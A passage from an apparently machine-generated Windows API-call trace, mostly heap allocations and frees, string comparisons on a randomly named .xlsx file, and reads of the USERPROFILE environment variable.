cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0220.406] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LcqE8DzcE8ZL.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0220.406] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cqE8DzcE8ZL.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0220.406] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qE8DzcE8ZL.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0220.406] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E8DzcE8ZL.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0220.406] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8DzcE8ZL.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0220.406] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DzcE8ZL.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0220.406] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zcE8ZL.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0220.406] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cE8ZL.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0220.406] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E8ZL.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0220.406] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8ZL.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0220.406] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZL.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0220.406] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0220.407] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0220.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2a73728 [0220.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0220.407] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73728 | out: hHeap=0x2af0000) returned 1 [0220.407] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0220.407] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0220.407] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0220.407] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0220.407] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0220.407] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0220.407] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0220.407] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0220.407] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0220.407] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7200 | out: hHeap=0x2af0000) returned 1 [0220.407] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0220.407] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0220.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0220.407] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0220.407] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0220.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0220.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722f8 [0220.407] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0220.407] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0220.407] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0220.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0220.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72258 [0220.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0220.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0220.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0220.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0220.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0220.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0220.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0220.408] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0220.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0220.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722c8 [0220.408] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0220.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0220.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0220.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab008 [0220.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0220.408] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0220.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaae40 [0220.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0220.408] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0220.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0220.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0220.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72318 [0220.408] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0220.408] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0220.408] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0220.408] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0220.408] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0220.409] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0220.409] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0220.409] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0220.409] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0220.409] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0220.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0220.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7220 [0220.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0220.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x38546c8 [0220.409] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0220.409] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0220.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0220.409] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0220.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72328 [0220.409] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0220.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0220.409] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0220.409] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7220 | out: hHeap=0x2af0000) returned 1 [0220.409] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0220.409] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0220.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72358 [0220.410] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0220.410] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0220.410] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0220.410] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0220.410] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0220.410] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0220.410] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0220.410] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0220.410] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72378 [0220.410] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0220.410] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0220.410] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0220.410] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab0e0 [0220.410] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0220.410] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0220.410] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab0b0 [0220.410] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0220.410] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0220.410] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0220.410] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0220.410] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0220.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0220.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0220.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0220.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0220.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0220.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0220.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0220.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0220.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0220.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0220.411] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0220.411] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f20 [0220.411] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0220.411] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x38540b0 [0220.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d50 | out: hHeap=0x2af0000) returned 1 [0220.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0220.411] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0220.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0220.411] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0220.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0220.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f20 | out: hHeap=0x2af0000) returned 1 [0220.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0220.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0220.411] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72378 [0220.411] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0220.412] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721e8 [0220.412] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0220.412] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0220.412] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72268 [0220.412] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0220.412] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0220.412] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0220.412] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaae40 [0220.412] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0220.412] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0220.412] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0220.412] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0220.412] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0220.412] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0220.412] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0220.412] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0220.412] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0220.412] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0220.412] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0220.412] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0220.412] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0220.412] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0220.412] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0220.412] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0220.412] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722b8 [0220.412] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0220.413] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0220.413] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0220.413] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0220.413] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0220.413] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0220.413] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0220.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0220.413] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0220.413] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0220.413] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0220.413] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.413] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0220.413] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0220.413] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0220.413] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0220.413] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0220.413] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0220.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0220.413] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0220.413] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0220.413] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0220.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0220.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0220.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0220.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0220.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0220.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0220.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0220.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0220.414] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0220.414] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0220.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721e8 [0220.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0220.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0220.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0220.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0220.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0220.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0220.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0220.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72328 [0220.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0220.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0220.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0220.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0220.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0220.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0220.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0220.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722f8 [0220.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0220.415] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0220.415] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0220.415] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0220.415] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0220.415] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0220.415] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0220.415] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0220.415] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0220.415] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0220.415] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.415] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0220.415] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72208 [0220.415] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0220.415] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0220.415] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0220.415] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0220.415] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0220.415] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0220.415] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0220.415] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0220.415] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0220.415] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0220.415] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0220.415] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0220.415] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0220.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: 